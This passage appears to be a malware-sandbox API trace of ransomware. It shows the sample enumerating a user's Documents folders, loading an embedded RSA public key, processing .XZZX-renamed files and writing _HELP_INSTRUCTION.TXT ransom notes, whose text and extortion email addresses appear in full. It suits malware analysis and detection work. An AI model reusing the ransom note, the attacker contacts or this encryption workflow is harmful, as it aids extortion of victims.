[0108.644] lstrcmpW (lpString1="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX", lpString2="..") returned 1 [0108.644] lstrcmpW (lpString1="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX", lpString2=".") returned 1 [0108.644] StrStrW (lpFirst="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0108.644] StrStrW (lpFirst="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX", lpSrch="ntldr") returned 0x0 [0108.644] StrStrW (lpFirst="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX", lpSrch="NTLDR") returned 0x0 [0108.644] StrStrW (lpFirst="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0108.644] StrStrW (lpFirst="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX", lpSrch="ntdetect.com") returned 0x0 [0108.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0108.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0108.644] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0108.644] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0108.644] lstrcpyW (in: lpString1=0x17addc, lpString2="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX" | out: lpString1="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX") returned="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX" [0108.644] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0108.644] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3f4 [0108.644] WaitForSingleObject (hHandle=0x3f4, dwMilliseconds=0xffffffff) returned 0x0 [0108.645] Sleep (dwMilliseconds=0x96) [0108.804] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0108.804] lstrcmpW (lpString1="E3E55C1830B142FC6C2B225E34DE2744.XZZX", lpString2="..") returned 1 [0108.804] lstrcmpW (lpString1="E3E55C1830B142FC6C2B225E34DE2744.XZZX", lpString2=".") returned 1 [0108.804] StrStrW (lpFirst="E3E55C1830B142FC6C2B225E34DE2744.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0108.804] StrStrW (lpFirst="E3E55C1830B142FC6C2B225E34DE2744.XZZX", lpSrch="ntldr") returned 0x0 [0108.804] StrStrW (lpFirst="E3E55C1830B142FC6C2B225E34DE2744.XZZX", lpSrch="NTLDR") returned 0x0 [0108.804] StrStrW (lpFirst="E3E55C1830B142FC6C2B225E34DE2744.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0108.804] StrStrW (lpFirst="E3E55C1830B142FC6C2B225E34DE2744.XZZX", lpSrch="ntdetect.com") returned 0x0 [0108.804] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0108.804] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0108.804] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0108.804] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0108.804] lstrcpyW (in: lpString1=0x17addc, lpString2="E3E55C1830B142FC6C2B225E34DE2744.XZZX" | out: lpString1="E3E55C1830B142FC6C2B225E34DE2744.XZZX") returned="E3E55C1830B142FC6C2B225E34DE2744.XZZX" [0108.804] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0108.804] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3f8 [0108.804] Sleep (dwMilliseconds=0x96) [0108.956] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0108.956] lstrcmpW (lpString1="F8F047460EB3954ECCCBC0D612CB7996.XZZX", lpString2="..") returned 1 [0108.956] lstrcmpW (lpString1="F8F047460EB3954ECCCBC0D612CB7996.XZZX", lpString2=".") returned 1 [0108.956] StrStrW (lpFirst="F8F047460EB3954ECCCBC0D612CB7996.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0108.956] StrStrW (lpFirst="F8F047460EB3954ECCCBC0D612CB7996.XZZX", lpSrch="ntldr") returned 0x0 [0108.956] StrStrW (lpFirst="F8F047460EB3954ECCCBC0D612CB7996.XZZX", lpSrch="NTLDR") returned 0x0 [0108.956] StrStrW (lpFirst="F8F047460EB3954ECCCBC0D612CB7996.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0108.956] StrStrW (lpFirst="F8F047460EB3954ECCCBC0D612CB7996.XZZX", lpSrch="ntdetect.com") returned 0x0 [0108.956] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0108.956] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0108.956] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0108.956] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0108.956] lstrcpyW (in: lpString1=0x17addc, lpString2="F8F047460EB3954ECCCBC0D612CB7996.XZZX" | out: lpString1="F8F047460EB3954ECCCBC0D612CB7996.XZZX") returned="F8F047460EB3954ECCCBC0D612CB7996.XZZX" [0108.956] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0108.956] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3fc [0108.957] Sleep (dwMilliseconds=0x96) [0109.112] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0109.112] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0109.112] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0109.112] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0109.112] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0109.112] FindClose (in: hFindFile=0x3a5650 | out: hFindFile=0x3a5650) returned 1 [0109.113] FindClose (in: hFindFile=0x3a5650 | out: hFindFile=0x3a5650) returned 0 [0109.113] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV" [0109.113] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\*.*" [0109.113] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0109.113] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0109.113] SetErrorMode (uMode=0x1) returned 0x1 [0109.113] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\_HELP_INSTRUCTION.TXT") returned 98 [0109.113] GetUserNameW (in: lpBuffer=0x178178, pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0109.113] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0109.113] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0x404) returned 0x0 [0109.114] RegQueryValueExW (in: hKey=0x404, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cb4ff0, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x3cb4ff0*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0109.114] RegCloseKey (hKey=0x404) returned 0x0 [0109.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0109.114] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0109.114] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0109.115] CloseHandle (hObject=0x404) returned 1 [0109.115] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3a5650 [0109.115] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV") returned="ZW28zqHzfxAY2NV" [0109.115] lstrcpyW (in: lpString1=0x17a5a4, lpString2="ZW28zqHzfxAY2NV" | out: lpString1="ZW28zqHzfxAY2NV") returned="ZW28zqHzfxAY2NV" [0109.116] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0109.116] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0109.116] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0109.116] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0109.116] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0109.116] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0109.116] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0109.116] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0109.116] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0109.116] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0109.116] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0109.116] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0109.116] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0109.116] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0109.116] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0109.116] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0109.116] FindClose (in: hFindFile=0x3a5650 | out: hFindFile=0x3a5650) returned 1 [0109.116] FindClose (in: hFindFile=0x3a5650 | out: hFindFile=0x3a5650) returned 0 [0109.116] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0109.116] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0109.117] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 1 [0109.117] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 0 [0109.117] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0109.117] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0109.117] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0109.117] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0109.117] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0109.117] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" [0109.117] SetErrorMode (uMode=0x1) returned 0x1 [0109.117] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" [0109.117] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\" [0109.117] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\" [0109.117] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*" [0109.117] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0109.117] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0109.117] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" [0109.118] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*" [0109.118] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="Desktop") returned 0x0 [0109.118] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="DESKTOP") returned 0x0 [0109.118] SetErrorMode (uMode=0x1) returned 0x1 [0109.118] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\_HELP_INSTRUCTION.TXT") returned 70 [0109.118] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0109.118] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0109.118] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x408) returned 0x0 [0109.118] RegQueryValueExW (in: hKey=0x408, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cb5220, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3cb5220*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0109.118] RegCloseKey (hKey=0x408) returned 0x0 [0109.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0109.119] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0109.119] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my music\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x408 [0109.119] CloseHandle (hObject=0x408) returned 1 [0109.120] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0109.120] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0109.120] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0109.120] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0109.120] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0109.120] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0109.120] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0109.120] lstrcatW (in: 